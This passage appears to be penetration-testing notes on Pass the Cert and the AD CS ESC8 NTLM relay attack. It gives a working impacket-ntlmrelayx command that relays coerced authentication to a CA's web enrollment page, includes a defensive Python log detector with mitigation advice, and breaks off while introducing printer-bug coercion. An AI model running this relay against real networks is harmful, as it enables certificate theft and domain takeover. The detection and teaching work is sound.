PKINIT, or Public Key Cryptography for Initial Authentication, is an extension of the Kerberos protocol that enables the use of public key cryptography during the initial authentication exchange.

It is typically used to support user logins via smart cards.

Pass the Cert refers to using this mechanism to obtain a TGT with a certificate instead of a password.

It is primarily used in attacks against AD CS and in Shadow Credentials attacks.

AD CS NTLM Relay Attack (ESC8)

Described in: https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

A CA configured to allow web enrollment typically hosts the enrollment application at /CertSrv.


ntlmrelayx can listen for inbound connections and relay them to the web enrollment service using:

impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication
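From the defender's side, the relay above leaves a trace on the CA's IIS server: a coerced machine account (a name ending in "$") authenticating to /certsrv/ and submitting to certfnsh.asp, typically over plain HTTP, which is exactly what web enrollment should never see from an interactive user. The following Python is an added example, not part of these notes or of impacket; it parses IIS W3C log lines and flags those two indicators. The log excerpt is constructed, and the two heuristics (machine accounts do not use web enrollment; authenticated enrollment over port 80 means HTTPS plus Extended Protection for Authentication is not enforced) are assumptions stated in the code, not a vendor-documented rule.

```python
"""Flag ESC8-style NTLM relay to AD CS web enrollment in IIS W3C logs.

Added example, not from the original notes. Assumes the CA's IIS server
logs the default W3C fields named in the #Fields header below.
Heuristics (assumptions, not a documented rule):
  * a /certsrv/ request authenticated as a machine account ('$' suffix)
    is anomalous: web enrollment is an interactive user workflow, while a
    relayed, coerced machine authentication looks exactly like this;
  * an authenticated /certsrv/ request over plain HTTP (port 80) shows the
    relay mitigation (HTTPS plus Extended Protection) is not in force.
"""
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple

# Constructed sample excerpt in IIS W3C format (not real data). The CA
# address reused from the notes; the 10.129.234.99 client is the relay host.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-05-01 10:01:12 10.129.234.110 GET /certsrv/ - 443 CORP\\alice 10.129.234.50 Mozilla/5.0 200
2024-05-01 10:01:15 10.129.234.110 POST /certsrv/certfnsh.asp - 443 CORP\\alice 10.129.234.50 Mozilla/5.0 200
2024-05-01 10:03:44 10.129.234.110 GET /certsrv/ - 80 - 10.129.234.99 python-requests/2.31 401
2024-05-01 10:03:44 10.129.234.110 GET /certsrv/ - 80 CORP\\DC01$ 10.129.234.99 python-requests/2.31 200
2024-05-01 10:03:45 10.129.234.110 POST /certsrv/certfnsh.asp - 80 CORP\\DC01$ 10.129.234.99 python-requests/2.31 200
2024-05-01 10:05:00 10.129.234.110 GET /certsrv/certcarc.asp - 443 CORP\\bob 10.129.234.51 Mozilla/5.0 200
"""


@dataclass(frozen=True)
class Finding:
    line_no: int
    reason: str
    user: str
    client_ip: str
    uri: str


def parse_w3c(text: str) -> Iterator[Tuple[int, Dict[str, str]]]:
    """Yield (line number, field->value) for each data row, using the #Fields header."""
    fields = None
    for line_no, raw in enumerate(text.splitlines(), start=1):
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#") or not raw.strip():
            continue
        if fields is None:
            raise ValueError("log entry before #Fields header")
        values = raw.split()
        if len(values) != len(fields):
            continue  # malformed row: skip rather than misattribute columns
        yield line_no, dict(zip(fields, values))


def find_esc8_indicators(text: str) -> List[Finding]:
    """Return one Finding per (row, heuristic) hit on the web enrollment path."""
    findings: List[Finding] = []
    for line_no, row in parse_w3c(text):
        uri = row["cs-uri-stem"].lower()
        if not uri.startswith("/certsrv"):
            continue
        user = row["cs-username"]
        if user == "-":
            continue  # anonymous 401 challenge round-trip, not yet authenticated
        client_ip = row["c-ip"]
        if user.endswith("$"):
            findings.append(Finding(line_no, "machine account used web enrollment", user, client_ip, uri))
        if row["s-port"] == "80":
            findings.append(Finding(line_no, "authenticated enrollment over plain HTTP", user, client_ip, uri))
    return findings


if __name__ == "__main__":
    for f in find_esc8_indicators(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}: {f.user} from {f.client_ip} -> {f.uri}")
```

Both hits come from the same relay client, so a real detection would pivot on c-ip and correlate with a coercion event (an SMB/RPC connection from that host to the machine that then "enrolled"). Removing the second heuristic's trigger is the fix itself: require HTTPS on the enrollment site and enable EPA, so a relayed NTLM authentication cannot be replayed to it.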

A way to force target machines to authenticate is to use the printer bug.

This requires the target machine to have the Print Spooler service running.

To force $TARGET (e.g. DC01) to authenticate against $ATTACKER: